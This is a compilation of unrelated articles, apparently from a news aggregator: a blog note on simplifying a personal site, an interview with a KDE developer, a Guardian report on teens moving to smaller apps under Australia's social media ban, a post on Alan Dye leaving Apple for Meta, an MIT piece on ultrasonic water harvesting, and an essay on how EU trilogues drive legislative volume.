I actually wanted to do the very opposite of what "vibe coders" typically use AI tools for: instead of providing a simple (and vague) instruction to let the AI go crazy and build a new blog from scratch, I used it to strip/simplify my existing blog software towards the open web hygiene I value:
Remove all external javascript (visitor trackers, etc)
Remove other third party dependencies as well, like fonts loaded from Google
Make the HTML/CSS structure "minimal" and dead simple, with a design that works well on mobile and desktop
Migrate away from the unfortunately unmaintained static site generation framework WinterSmith, instead use a super simple script that just generates all pages inline (a rough sketch of such a script follows below).
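To make that last point a bit more concrete, here is a minimal sketch of what such a generator script could look like. This is not the author's actual script (that one lives in the mijnrealiteit repository mentioned just below); it assumes posts are plain Markdown files and that pandoc is installed, purely to illustrate the "dumb script instead of a framework" idea.

#!/bin/sh
# Hypothetical sketch, not the real generator: render every Markdown post in
# posts/ to a standalone HTML page in public/, sharing one stylesheet.
mkdir -p public
for post in posts/*.md; do
  out="public/$(basename "${post%.md}").html"
  pandoc --standalone --css=style.css "$post" -o "$out"
done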
You can find the code for mijnrealiteit on github, I'll publish the code for this blog soon as well.
It's all live now, as well as a super minimal "about me" site on mvr.com. So I can get back to blogging! Will anyone actually read anything I post? I won't know since I removed all trackers. So for now I am screaming into the void.
Lobsters Interview with Aks
Lobsters
lobste.rs
2025-12-05 02:41:30
I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal!
Please introduce yourself!
I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up doing computer stuff as a day job. Nowadays I work on KDE software at TechPaladin.
How did you first discover computers as a kid?
I was 3-4 years old. We had an old 386 DOS computer and I usually played games like Stunts on it. I was always behind when it came to hardware. While all my peers at school would have PS2s, I played on NES and PS1. Over time I just liked to play and tinker with different kinds of machines, mostly old left-over computers. But games were my main hook, I always wanted to make my own. And I did!
What were your first games like?
My very first game was with FPS Creator when I was ~13. My friend and I had some inside joke about a game with tons of enemies and a gun with 6 bullets, so I ended up recreating that. The game is really bad, but that was sort of the point. The next game I made when I was 18 or so, with Unity. Similar theme, but this time the enemies were dancing and bouncing skeletons, and you had a shotgun. It was so silly. I then made a roguelike, a 3D platformer, and an FPS called Penance that has about 19k downloads. You can find my games on Itch. Lately though, I haven't had the energy to finish my game projects, e.g. Artificial Rage: https://codeberg.org/akselmo/Artificial-Rage
I sank a fair few hours into Penance! I also really liked the Christmas game you made for your sister. Do you ever put Easter eggs in code or often make projects for others like that?
I put some Easter eggs. For example someone complained that in Penance all the weapons look like woolen socks(?). So I added a pair of wooly socks in the starting area. I also proposed to my wife with a game, which had a small hallway with pictures of us. It was a fun little project, but a bit cut short since I tried to work on it as a secret, which proved difficult! We have made a few games together. She went to a web-dev bootcamp but doesn't code anymore, although she gladly works with me on various game projects.
How do you ideate the game play, style and such things?
While playing, I usually think it "would be cool if I had this game but changed this and that...", which provides a great starting point. Then it just naturally evolves into its own thing. Penance was pretty much me going "I want Quake but with randomly generated levels" but then I ended up making a campaign with handcrafted levels for it anyway, besides the randomly generated endless mode.
Really, I just make things I want to play. People liking it is just a bonus. One of my favorite game projects is Castle Rodok because it is full of lore about my own RPG world. It's not very popular, but I like it a lot. It was a passion project.
What languages and technologies did you use?
With tools, I'm driven by need more than wants. My day job is all C++, which I'm fine with. I am very much a fan of "C-style" languages. They're boring and get the job done. For things I want to get running quick, I usually use Python, which I used a lot in test automation for all kinds of devices. Mostly medical devices so I can't talk about them due to NDAs.
Most of my games have been in Unity, but Crypt of Darne uses Python and I also have played around with C and Odin for my game projects.
I have tried LISPs and functional programming languages and such, but I just have a hard time with them, especially with those that propose a completely different syntax to me. I haven't had any projects with Rust but I liked tinkering with it, besides the 'lifetime syntax, which I easily miss. I am very boring when it comes to programming languages, I like to stick with what I know. I wanderlust about what I can create: Games, apps, systems software, drivers... Many ideas but hardly any time. But work comes first, so I mostly work on KDE things right now. For my own things, if I feel like working on a game, I go with the flow and do that.
What was your experience with different OSes before finding KDE?
I'd wanted to move on from Windows and dabbled with Linux a bunch, but could never stick to it because I could not play any games I owned on Linux. When I learned that Linux systems can in fact game, it didn't take me long to switch. At first, I just dual-booted and tested the waters. I tried Linux Mint and Ubuntu, which were fine, but I had some issues with X11 and its compositing eating all the FPS, so I gave up for a while. 6 months later I tried Kubuntu, which worked really well for my needs. After some time I hopped to Fedora KDE, and there I found out that Wayland completely removed the issue with the compositing eating FPS in games. KDE was also very easy to learn and understand. I didn't really need to customize it. Then I found an annoying bug I wanted to fix, and started to contribute.
What was the first contribution experience like?
I had no idea how to do anything with C++. I learned C from scratch making Artificial Rage, studying how to create a project with CMake and all that, but luckily the internet is full of advice. So I had not used C++ before and just started learning to make that first contribution! I just joined the Matrix chats and asked questions; people were very helpful. Onboarding was great. It wasn't very big though, I just looked at the surrounding code and made my contribution look the part. Feedback in the merge request on Gitlab helped wrap it up. One of my first larger contributions though was adding region and language settings to system settings. This allowed users to change, for example, date-time settings differently than currency. This was a mix of C and C++ and was difficult! Diligently reading the docs, looking at similar code and a lot of build->test->change->build again... it started to work! Then the reviews helped too. But C++ is such a different beast, I'm still learning it to this day. I'd say I know less C++ and more about problem solving.
It also helps that the "Qt dialect" of C++ is rather nice. The Qt framework does a lot of the work for you. For example, the signal and slot system, or objects having parent objects that clean up their children when they are destroyed. Qt's documentation is also pretty great.
I'm still learning and don't have much in depth knowledge, but I hate header files. Modifying the same thing (function declarations) in two places makes no sense. It should autogenerate as part of the compilation. I found some such header generating tools, but they go unused and quietly forgotten. I suspect they would confuse language servers too, so it's a tooling issue.
What are your thoughts on Linux over all, big things which need changing but no one is working on or nice initiatives which you think will improve things, etc.?
The Linux desktop is getting much, much better and I see a hopeful future. Will it ever be the main OS, like Windows is? Probably not, unless hardware manufacturers/OEMs start installing Linux distros by default, instead of Windows. But I'm hopeful we'll get to 5%-10% worldwide usage. Now that gaming is possible on Linux, a lot of people moved over. Just a few weeks ago I installed Bazzite for my friend who has been using Windows forever, but didn't want to use Win11.
Our next step is to make sure accessibility is up to snuff. At least for KDE, we have an accessibility engineer who is brilliant at their job. Then, I think immutable systems might get more popular. Personally I'm fine with either, but for those who view their computer more as an appliance than a computer, immutable systems are very nice: They allow them to jump from broken state back to working state with ease (select different boot entry at startup).
Complex software's never done; improvements are always needed. Accessibility means more than just accessibility settings: Make it easy to install, test, run, etc... If Linux desktops can get more hardware manufacturers on board to install Linux desktop as default, that will certainly help too. Also shoutout to the EndOf10 (https://endof10.org/) initiative; when I shared it around to my non-nerdy friends, they were very curious about the Linux desktop and I had an excuse to ramble about it to them! In a nutshell: I am hopeful, but we can't rest on our laurels, we need to stop fighting over "what's the best desktop" and work together more.
BTW, if anyone reading this has been Linux curious, go for it! Take a secondary device and play around with it there. And I also want to point out: don't be afraid to contribute to things you like in any way you can, be it software or hardware or the actual physical world.
How do you see it in light of more phone usage, less desktop usage? Have you any impressions of governments or businesses moving to linux?
Computers are still widely used where I live, at least within my generation. Those who game especially often have a desktop PC. It may not be top-of-the-line hardcore gaming rig, but they have one to play a bit of Counter-Strike or similar games.
Phones are the king of "basic stuff" and for many people a tablet functions as a simple internet appliance. I can only hope that projects like PostmarketOS (https://postmarketos.org/) will help to keep these tablets and phones working when the regular Android updates stop, to ease the avalanche of e-waste.
When it comes to governments and businesses, I wish they did it more. I have heard that in Germany more governments are testing it out. In Finland, I do not know, but I would like to drive more for it.
It's certainly an area where we should try to help as much as possible as well.
How can we (individuals or organizations) help?
Individual users: Make sure to report bugs and issues, and share knowledge. Do not evangelize or push the matter, just say it's something you use and elaborate when people ask. Too many times I've seen people pushed away from using the Linux desktop because people are very... pushy. As surprising as it may be, not many people really care as much as we do!
Organizations: Try to adopt more FOSS technologies for daily things, e.g. LibreOffice. Start small.
It does not need to be an overnight change, just small things here and there.
How many resources do you have compared to the demands of everything you are working on?
We're definitely stretched. We always could use more help, though C++ seems to deter that help a bit, which I can understand. But if I could start from scratch, I'm sure anyone can! Besides, more and more projects use QML and Rust. For testing, there's Python.
What prerequisites are there for contributing?
We have a Matrix chat for new contributors, where people can ask questions (and answering questions there is also a way to contribute). All of it is documented. When triaging, I am trying to more often tag bugs in Bugzilla as "junior jobs" to make things more approachable. Mentoring etc. is a community effort, and those who are willing to learn will receive help, though we're all rather busy so we hope people put some effort into trying to learn things too, of course.
How could bug reporting be improved?
I think we could half-automate bug reports, to make things easier: Gather basic information and ask basic questions upfront, without needing to open a web browser. For crash reports, we use a tool called DrKonqi: When an app crashes, it gathers backtraces etc. automagically and allows the user to type what happened in a field. Something similar for regular ol' bugs would be great. Games do this by taking screenshots and logs when the player opens the bug-report tool. But someone would still have to go through them, which is also an excellent way for anyone to contribute: Go through some bug reports, see if you can reproduce them or not, and report back to them with your system information. Anyone can do it, it's not a difficult job, just a bit tedious, especially when there's thousands of bug reports and 10 people going through them.
How do you approach problem solving?
Depends on the problem! If a bug causes a crash, a backtrace is usually helpful. If not, I go with trusty print-debugging to see exactly where things start acting weird. I like to approach it from many different angles at the same time:
Sometimes I try to fix the bug to figure it out: Why does a given change fix the bug?
The fix may not be the correct fix yet.
Of course, a well written bugreport with good reproduction steps helps a lot!
git blame is a good friend, asking people who implemented things can really help. But sometimes I work on code where it just says "moved to git in 2013" and the original code's from the 90s.
Talking to other people
Writing notes down as you try to understand the bug
Anything that pokes your brain in multiple different directions.
I really like the idea of fixing a bug in multiple ways to really see what's needed. How do you determine whether something is the proper fix or not?
Sometimes the code just "feels right" or someone more knowledgeable can tell me. Of course, fixing simple visual errors should not need a ton of changes around the codebase. Changes should be proportional to the bug's difficulty/complexity, but there's no clear answer. It's more a gut feeling.
What inspires you to have an online presence (in irc, commenting, blog posts etc.)? How do you decide when to make a blog post or not?
For blog posts, I ask myself: "Do I need to remember this?" Some are just a note for myself, which others might find useful too.
I once deleted my lobste.rs account because it took up too much time. Now that all my work is remote, I kind of miss coffee breaks and office chitchat, so I hang about in IRC, Matrix, the Fediverse, Lobsters etc. to fill my Sims status bar. I still prefer remote work, but I wouldn't mind a hybrid option at times. Also, removing the lobste.rs bookmark stopped me reflexively clicking it.
Due to learning I have ADHD and very likely autism, I have worked on myself (mentally) and internalized that I don't need to constantly go through these sites. Notice the problematic behavior, then cut it out. Whenever I notice I'm stuck in a loop opening and closing the same sites, I've learned to close the web-browser and do something else. The hardest part is actually noticing it.
Do you have any interesting personal tools? I use your colorscheme.
I journal a lot on a remarkable2 tablet when working, writing down what I have done, should do or notes figuring out problems. Writing by hand helps me remember things too. I made an RSS "newspaper" script for my tablet too, which also shows the daily weather now.
I also use todo.txt for tasks, like my own list of bugs and other projects I need to go through. I even wrote an app for it called KomoDo.
Then I use Obsidian for any technical notes and know-how, like programming and computer things that are pain to write by hand.
It was even before GitHub started getting "AI" stuff. I just got tired of GitHub being a social media site instead of a good platform. SourceHut would have been nice too, I just didn't know of it at the time. I'm also wary of the email workflow, but wouldn't be opposed to learning it.
Teens hoping to get around Australia’s social media ban are rushing to smaller apps. Where are they going?
Guardian
www.theguardian.com
2025-12-05 02:11:23
As Meta begins deleting accounts and the deadline looms, children have already begun to flock to platforms not included in the banned list, like Coverstar, Lemon8, Yope and Rednote.
As Australia prepares to block under-16s from accessing 10 of its largest social media platforms, less prominent companies have begun courting the teen market – in some cases paying underaged influencers to promote them.
One teenaged TikTok influencer said in a paid “collab” video for the app Coverstar: “The social media ban is fast approaching, but I found the new cool app we can all move to.”
From 10 December all under-16s in Australia will notionally be banned from TikTok, Instagram, Snapchat, YouTube, Reddit, Twitch, Kick and X as Australia’s world-first social media laws come into effect.
Questions remain about how effective the ban will be, with many children hoping to circumvent it. Others have started looking elsewhere for their social media fix.
Along with Coverstar, lesser known apps such as Lemon8 and photo-sharing app Yope have skyrocketed on Australia’s download charts in recent weeks, currently ranked first and second in Apple’s lifestyle category respectively.
The government has repeatedly said its ban list is “dynamic”, with the potential for new apps to be added. Experts have raised concerns the government is starting a game of “whack-a-mole”, pushing children and teenagers to lesser known corners of the internet.
“A potential consequence of this legislation is that it might actually inadvertently create more risk for young people,” says Dr Catherine Page Jeffery, an expert in digital media and technological change at the University of Sydney.
“There is a very real possibility that, if young people do migrate to less regulated platforms, they become more secretive about their social media use because they’re not supposed to be on there, and therefore if they do encounter concerning material or have harmful experiences online that they won’t talk to their parents about it.”
Here’s what we know about some of the apps where children are migrating.
Coverstar
The US-based video-sharing platform Coverstar describes itself as a “new kind of social app for Gen Alpha – built for creativity, powered by AI, and safer than TikTok”. The app, which is not covered by the social media ban, sits at number 45 on Apple’s Australian downloads chart.
The video-sharing platform allows children as young as four to livestream, post videos and comment. Users under the age of 13 require a parent to film themselves saying “My name is ____ and I give permission to use Coverstar”, which is then verified by the app. Adults are also free to make an account, post content and interact in the comments sections.
Like TikTok and Instagram, users can spend real money to buy virtual “gifts” to send to creators who go live, and the app also includes a “premium” paid subscription with advanced features.
Coverstar advertises its safety features as a lack of direct messaging, a strict no-bullying policy and 24/7 monitoring by AI and human moderators.
Dr Jennifer Beckett, an expert in online governance and social media moderation from the University of Melbourne, says Coverstar’s repeated promotion of their use of AI raises some questions.
“They are really spruiking that they use [AI] a lot, and it’s not great,” she says.
AI has been widely used in social media moderation for years, however Beckett says it has significant limitations.
“It is not nuanced, it is not contextual. It’s why you have a layer of humans on the top. The question is: how many humans do they have?”
Coverstar has been contacted for comment.
Lemon8
Lemon8, an Instagram-esque photo and video-sharing app owned by TikTok’s parent company, ByteDance, has boomed in popularity in recent weeks.
Users can connect a TikTok account, allowing them to seamlessly transport video content over to Lemon8. They can also re-follow all their favourite TikTok accounts on the new platform with a single tap.

However, on Tuesday Australia’s eSafety commissioner, Julie Inman Grant, announced that her office had written to Lemon8, recommending it self-assess to determine if the new laws apply to it.
Yope
With only 1,400 reviews on the Apple app store, Yope is a “friend-only private photo messaging app” that has been floated as a post-ban alternative to Snapchat.
Yope’s cofounder and chief executive, Bahram Ismailau, described the operation as “a small team of a few dozen people building the best space for teens to share photos with friends”.
As with Lemon8, Australia’s eSafety commissioner said she had written to Yope advising it to self-assess. Ismailau told the Guardian he had not received any correspondence, however he was “ready to provide our official position on the overall eSafety policy regarding age-restricted social media platforms”.
He said that after conducting a self-assessment Yope believes it fully meets the exemption in the law that excludes apps that are solely or primarily designed for messaging, emailing, video or voice calling.
Australian government adds Reddit and Kick to under-16s social media ban – video
“Yope is a photo messenger with no public content,” Ismailau said. “Yope is fundamentally as safe as iMessage or WhatsApp.”
Yope’s website states the app is for users aged over 13, and those between 13 and 18 “may use the app only with the involvement of a parent or guardian”. However the Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission.
A mobile phone number is required to create an account.
Ismailau did not directly respond to questions about the under-13s account, however he noted the team was planning to update their privacy policy and terms of use within the next week to “better reflect how the app is actually used and who it’s intended for”.
Rednote
Also known as Xiaohongshu, this Chinese video-sharing app was the destination of choice for Americans during TikTok’s brief ban in the US earlier this year.
Beckett said the app may be a safe place to go. “They have much stronger regulations on social media in China – and we see that reflected in the kinds of content that has to be moderated,” she says. “So I would almost say if you’re going to go somewhere, it’s probably the safest place to go.
“It’s not without its trials and tribulations because we know on TikTok, even when it was still in Bytedance’s control, there was so much pro-ana [anorexia] content.”
However, cybersecurity experts say the app collects extensive personal data, which it can share with third-party platforms or may be compelled by law to share with the Chinese government.
Even with an ever-expanding list of banned social media sites, experts say the government is underestimating children’s desire to use social media – and their creativity when it comes to finding a way.
“I don’t think we give them enough credit for how smart they are,” Beckett says. “Kids are geniuses when it comes to pushing boundaries.”
Anecdotally, the Guardian understands some children have been discussing using website builders to create their own forums and chat boards. Others have suggested chatting via a shared Google Doc if texting isn’t an option for them.
“They’re going to get around it,” Beckett said. “They’ll figure it out.”
★ Alan Dye Was in Tim Cook’s Blind Spot
Daring Fireball
daringfireball.net
2025-12-05 01:53:12
How could someone who would even *consider* leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?...
Speaking at a town hall event hosted by MSNBC’s Chris Hayes and
Recode’s Kara Swisher, Cook said Facebook put profits above all
else when it allegedly allowed user data to be taken through
connected apps. [...]
When asked what he would do if he were in Zuckerberg’s position,
Cook replied: “What would I do? I wouldn’t be in this situation.”
“The truth is we could make a ton of money if we monetized our
customer, if our customer was our product,” Cook said. “We’ve
elected not to do that.”
“Privacy to us is a human right. It’s a civil liberty, and
something that is unique to America. This is like freedom of
speech and freedom of the press,” Cook said. “Privacy is right up
there with that for us.”
Perhaps Cook now needs to define “us”.
This was a rather memorable interview. Cook’s “What would I do? I wouldn’t be in this situation” is one of the stone-coldest lines he’s ever zinged at a rival company. (In public, that is.) That was just ice cold. Cook is a consummate diplomat. Most non-founder big company CEOs are. Satya Nadella, Sundar Pichai, Andy Jassy — none of them are known for throwing shade, let alone sharp elbows, at competitors. Cook has made an exception, multiple times, when it comes to Facebook/Meta (and to a lesser degree, Google).
So it’s not just that Alan Dye jumped ship from Apple for the chief design officer role at another company.1 It’s not just that he left for a rival company. It’s that he left Apple for Meta, of all companies. Given what Cook has said about Meta publicly, one can only imagine what he thinks about them privately. Apple executives tend to stay at Apple. The stability of its executive team is unparalleled. But Dye is a senior leader who not only left for a rival, but the one rival that Cook and the rest of Apple’s senior leadership team consider the most antithetical to Apple’s ideals.
It would have been surprising if Dye had jumped ship to Google or Microsoft. It would have been a little more surprising if he’d left for Amazon, if only because Amazon seemingly places no cultural value whatsoever on design, as Apple practices it. But maybe with Amazon it would have been seen as Andy Jassy deciding to get serious about design, and thus, in a way, less surprising after the fact. But leaving Apple for Meta, of all companies, feels shocking. How could someone who would even consider leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?
So it’s not just that Alan Dye is a fraud of a UI designer and leader, and that Apple’s senior leadership had a blind spot to the ways Dye’s leadership was steering Apple’s interface design deeply astray. That’s problem enough, as I emphasized in my piece yesterday. It’s also that it’s now clear that Dye’s moral compass was not aligned with Apple’s either. Tim Cook and the rest — or at least most? — of Apple’s senior leadership apparently couldn’t see that, either.
Ultrasonic device dramatically speeds harvesting of water from the air
Feeling thirsty? Why not tap into the air? Even in desert conditions, there exists some level of humidity that, with the right material, can be soaked up and squeezed out to produce clean drinking water. In recent years, scientists have developed a host of promising sponge-like materials for this “atmospheric water harvesting.”
But recovering the water from these materials usually requires heat — and time. Existing designs rely on heat from the sun to evaporate water from the materials and condense it into droplets. But this step can take hours or even days.
Now, MIT engineers have come up with a way to quickly recover water from an atmospheric water harvesting material. Rather than wait for the sun to evaporate water out, the team uses ultrasonic waves to shake the water out.
The researchers have developed an ultrasonic device that vibrates at high frequency. When a water-harvesting material, known as a “sorbent,” is placed on the device, the device emits ultrasound waves that are tuned to shake water molecules out of the sorbent. The team found that the device recovers water in minutes, versus the tens of minutes or hours required by thermal designs.
Unlike heat-based designs, the device does require a power source. The team envisions that the device could be powered by a small solar cell, which could also act as a sensor to detect when the sorbent is full. It could also be programmed to automatically turn on whenever a material has harvested enough moisture to be extracted. In this way, a system could soak up and shake out water from the air over many cycles in a single day.
“People have been looking for ways to harvest water from the atmosphere, which could be a big source of water particularly for desert regions and places where there is not even saltwater to desalinate,” says Svetlana Boriskina, principal research scientist in MIT’s Department of Mechanical Engineering. “Now we have a way to recover water quickly and efficiently.”
Boriskina and her colleagues report on their new device in a study appearing today in the journal Nature Communications. The study’s first author is Ikra Iftekhar Shuvo, an MIT graduate student in media arts and sciences, along with Carlos Díaz-Marín, Marvin Christen, Michael Lherbette, and Christopher Liem.
Precious hours
Boriskina’s group at MIT develops materials that interact with the environment in novel ways. Recently, her group explored atmospheric water harvesting (AWH), and ways that materials can be designed to efficiently absorb water from the air. The hope is that, if they can work reliably, AWH systems would be of most benefit to communities where traditional sources of drinking water — and even saltwater — are scarce.
Like other groups, Boriskina’s lab had generally assumed that an AWH system in the field would absorb moisture during the night, and then use the heat from the sun during the day to naturally evaporate the water and condense it for collection.
“Any material that’s very good at capturing water doesn’t want to part with that water,” Boriskina explains. “So you need to put a lot of energy and precious hours into pulling water out of the material.”
She realized there could be a faster way to recover water after Ikra Shuvo joined her group. Shuvo had been working with ultrasound for wearable medical device applications. When he and Boriskina considered ideas for new projects, they realized that ultrasound could be a way to speed up the recovery step in atmospheric water harvesting.
“It clicked: We have this big problem we’re trying to solve, and now Ikra seemed to have a tool that can be used to solve this problem,” Boriskina recalls.
Water dance
Ultrasound, or ultrasonic waves, are acoustic pressure waves that travel at frequencies of over 20 kilohertz (20,000 cycles per second). Such high-frequency waves are not visible or audible to humans. And, as the team found, ultrasound vibrates at just the right frequency to shake water out of a material.
“With ultrasound, we can precisely break the weak bonds between water molecules and the sites where they’re sitting,” Shuvo says. “It’s like the water is dancing with the waves, and this targeted disturbance creates momentum that releases the water molecules, and we can see them shake out in droplets.”
Shuvo and Boriskina designed a new ultrasonic actuator to recover water from an atmospheric water harvesting material. The heart of the device is a flat ceramic ring that vibrates when voltage is applied. This ring is surrounded by an outer ring that is studded with tiny nozzles. Water droplets that shake out of a material can drop through the nozzle and into collection vessels attached above and below the vibrating ring.
They tested the device on a previously designed atmospheric water harvesting material. Using quarter-sized samples of the material, the team first placed each sample in a humidity chamber, set to various humidity levels. Over time, the samples absorbed moisture and became saturated. The researchers then placed each sample on the ultrasonic actuator and powered it on to vibrate at ultrasonic frequencies. In all cases, the device was able to shake out enough water to dry out each sample in just a few minutes.
The researchers calculate that, compared to using heat from the sun, the ultrasonic design is 45 times more efficient at extracting water from the same material.
“The beauty of this device is that it’s completely complementary and can be an add-on to almost any sorbent material,” says Boriskina, who envisions a practical, household system might consist of a fast-absorbing material and an ultrasonic actuator, each about the size of a window. Once the material is saturated, the actuator would briefly turn on, powered by a solar cell, to shake out the water. The material would then be ready to harvest more water, in multiple cycles throughout a single day.
“It’s all about how much water you can extract per day,” she says. “With ultrasound, we can recover water quickly, and cycle again and again. That can add up to a lot per day.”
This work was supported, in part, by the MIT Abdul Latif Jameel Water and Food Systems Lab and the MIT-Israel Zuckerman STEM Fund.
This work was carried out in part by using MIT.nano and ISN facilities at MIT.
The central puzzle of the EU is its extraordinary productivity. Grand coalitions, like the government recently formed in Germany, typically produce paralysis. The EU’s governing coalition is even grander, spanning the center-right EPP, the Socialists, the Liberals, and often the Greens, yet between 2019 and 2024, the EU passed around 13,000 acts, about seven per day. The U.S. Congress, over the same period, produced roughly 3,500 pieces of legislation and 2,000 resolutions.1
Not only is the coalition broad, but it also encompasses huge national and regional diversity. In Brussels, the Parliament has 705 members from roughly 200 national parties. The Council represents 27 sovereign governments with conflicting interests. A law faces a double hurdle: a qualified majority of member states and of members of parliament must support it. The system should produce gridlock, even more than the paralysis commonly associated with the American federal government. Yet it works fast and produces a lot, both good and bad. The reason lies in the incentives: every actor in the system is rewarded for producing legislation, and not for exercising their vetoes.
Understanding the incentives
The Commission initiates legislation, but it has no reason to be reticent. It cannot make policy by announcing new spending commitments and investments, as the budget is tiny, around one percent of GDP, and what little money it has is mostly earmarked for agriculture (one-third) and regional aid (one-third). In Brussels, policy equals legislation. Unlike their national counterparts, civil servants and politicians who work in Brussels have one main path to building a career: passing legislation.
Legislation is valuable to the Commission, as new laws expand Commission competences, create precedent, employ more staff, and justify larger budgets. The Commission, which is indirectly elected and faces little pressure from voters, has no institutional interest in concluding that EU action is unnecessary, that existing national rules suffice, or that a country already has a great solution and others should simply learn from it.
The formal legislative process was designed to work through public disagreement, with each institution’s amendments debated and voted on in open session. The Commission proposes the text. Parliament debates and amends it in public. The Council reviews it and can force changes. If they disagree, the text bounces back and forth. If the deadlock persists, a joint committee attempts to force a compromise before a final vote. Each stage requires a full majority. Contentious laws took years.
This slow process changed in stages. The Amsterdam Treaty (1999) allowed Parliament and Council to adopt laws at the First Reading if an agreement was reached early. Initially, this was exceptional, but by the 2008 financial crisis, speed became a priority. The Barroso Commission argued that EU survival required rapid response, and it deemed sequential public readings too slow.
The trilogues became the solution after a formal “declaration” in 2007, though the Treaties never mention them. Instead of public debate, representatives from the Parliament, Council, and Commission meet privately to agree on the text. They work from a “four-column document.” The first three columns list the starting positions of each institution; the fourth column contains the emerging law. The Commission acts as the “pen-holder” for this fourth column. This gives them immense power: by controlling the wording of the compromise, they can subtly exclude options they dislike.
Because these meetings are informal, they lack rules on duration or conduct. Negotiators often work in “marathon” sessions that stretch until dawn to force a deal. The final meeting for the AI Act, for instance, lasted nearly 38 hours. This physical exhaustion leads to drafting errors. Ministers and MEPs, desperate to finish, agree to complex details at 4:00 a.m. that they have not properly read. By the time the legislation reaches the chamber floor, the deal is done, errors and all.
2
Final agreement of the Trilogue for the Recovery and Resilience Facility (Regulation (EU) 2021/241). Early morning hours of December 18, 2020. Left to right: Garicano (Renew), Boeselager (Greens), Van Overtveldt (ECR), Muresan (EPP), Clauss (German Council Presidency), Dombrovskis (EU Commission), Tinagli (S&D), García (S&D), Pislaru (Renew).
The European Parliament is the institution that is accountable to the voters. But it is the parliamentary committees, and their ideology, that matter, not the plenary or the political parties to which MEPs belong. Those who join EMPL, which covers labor laws, want stronger social protections. Those who join ENVI want tougher climate rules.
The committee coordinator for each political group appoints one MEP to handle the legislative file: the Rapporteur for the lead group, Shadow Rapporteurs for the others. These five to seven people negotiate the law among themselves, nominally on behalf of their groups. In practice, no one outside the committee has any say.
When the negotiating team reaches an agreement (normally, a grand coalition of the centrist groups), they return to the full committee. The committee in turn usually backs the deal, given that the rapporteurs who made it represent a majority in the committee, and the committee self-selects based on ideology.
Crucially, the rapporteurs then present the deal to their political groups as inevitable, based on the tenuous majority of the centrist coalition that governs Europe. “This is the best compromise we can get,” the rapporteur invariably announces. “Any amendment will cause the EPP/Greens/S&D/Renew to drop the deal.”
Groups face pressure for a simple up-or-down vote, and often prefer claiming a deal to doing nothing. MEPs who refuse to support the deal may be branded as troublemakers and risk losing support on their own files in the future.
Often just a couple of weeks after the committee vote, the legislation reaches the full Parliament to obtain a mandate authorizing trilogue negotiations, with little time for the remaining MEPs to grasp what is happening.
The dynamic empowers a small committee majority to drive major policy change. For example, in May 2022, the ENVI committee approved (by just 6 votes) a mandate to cut CO₂ emissions from new cars by 100% by 2035. De facto, this bans new petrol and diesel cars from that date.
Less than four weeks later, in June 2022, Parliament rubber-stamped that position as its official negotiating mandate, with a “Ferrari” exception for niche sports cars. Those four weeks left almost no time to debate, consult national delegations, or reconsider the committee’s position. From that slim committee vote, the EU proceeded toward a historic, continent-wide shift to electric vehicles.
Similarly, the EMPL committee approved, in November 2021, the Directive on Adequate Minimum Wages, even though Article 153(5) of the Treaty on the Functioning of the EU explicitly excludes “pay” from the EU’s social policy competences. Co-Rapporteurs Dennis Radtke (center-right EPP) and Agnes Jongerius (center-left S&D) formed a tight alliance and gained a majority in committee, sidelining fierce opposition from countries like Denmark and Sweden that wished to protect their national wage-bargaining systems.
The committee’s text was rushed to plenary and adopted as Parliament’s position fourteen days later (in late November). The system let a committee majority deliver a law the Court of Justice ruled partially illegal in November 2025, precisely at the request of the Nordic states, striking down Article 5(2) on criteria for setting minimum wages.
The player you’d expect to check any excesses is the Council of Ministers from the member states, which represents national governments. But the way the Council participates in the drafting dilutes this check. The Council is represented by the country holding the rotating Presidency, which changes every six months. Each Presidency comes in with a political agenda and a strong incentive to succeed during its short tenure. With a 13-year wait before that member state will hold it again, the Presidency is under pressure to close deals quickly, especially on its priority files, to claim credit. This can make the Council side surprisingly eager to compromise and wrap things up, even at the cost of making more concessions than some member states would ideally like.
The Commission presents itself as a neutral broker during the trilogue process. It is not. By controlling the wording of the draft agreement (“Column four”), the Commission can subtly exclude options misaligned with its preferences. It knows the dossiers inside out and can use its institutional memory to its advantage. Commission services analyze positions of key MEPs and Council delegations in advance, triangulating deals that preserve core objectives.
The Commission also exploits the six-month presidency rotation. Research shows it strategically delays proposals until a Member State with similar preferences takes over.
3
As the six-month Presidency clock winds down, the Council’s willingness to make concessions often increases. No country wants to hand off an unfinished file to the next country, if it can avoid it. The Commission, aware of this, often pushes for marathon trilogues right before deadlines or the end of a Presidency to extract the final compromises.
As legislation has grown more technical, elected officials have grown more reliant on their staff. Accredited Parliamentary Assistants (APAs) to MEPs, as well as political group advisers and Council attachés, play a large role. These staffers have become primary drafters of amendments and key negotiators representing their bosses in “technical trilogues”, where substantial political decisions are often disguised as technical adjustments.
4
COVID-19 accelerated this. Physical closure increased reliance on written exchanges and remote connections, favoring APAs and the permanent secretariats of Commission, Parliament, and Council. The pandemic created a “Zoom Parliament” where corridor conversations, crucial to coalition-building among MEPs, disappeared. In my experience, they did not fully return after the pandemic. This again greatly strengthened the hand of the Commission.
Quantity without quality
The result of this volume bias in the system is an onslaught of low-quality legislation. Compliance is often impossible. A BusinessEurope analysis cited by the Draghi report looked at just 13 pieces of EU legislation and found 169 cases where different laws impose requirements on the same issue. In almost a third of these overlaps, the detailed requirements were different, and in about one in ten they were outright contradictory.
Part of the problem is the lack of feedback loops and impact assessment at the aggregate level. The Commission’s Standard Cost Model for calculating regulatory burdens varies in application across files. Amendments introduced by Parliament or Council are never subject to cost-benefit analysis.
No single methodology assesses EU legislation once transposed nationally. Only a few Member States systematically measure a transposed law’s impact. The EU has few institutionalized mechanisms to evaluate whether a given piece of legislation actually achieved its objectives. Instead, the Brussels machinery tends to simply move on to the next legislative project.
Brussels’ amazing productivity doesn’t make sense if you look at how the treaties are written, but it is obvious once you understand the informal incentives facing every relevant player in the process. Formally, the EU is a multi-actor system with many veto points (Commission, Parliament, Council, national governments, etc.), which should require broad agreement and hence slow decision making. In practice, consensus is manufactured in advance rather than reached through deliberation.
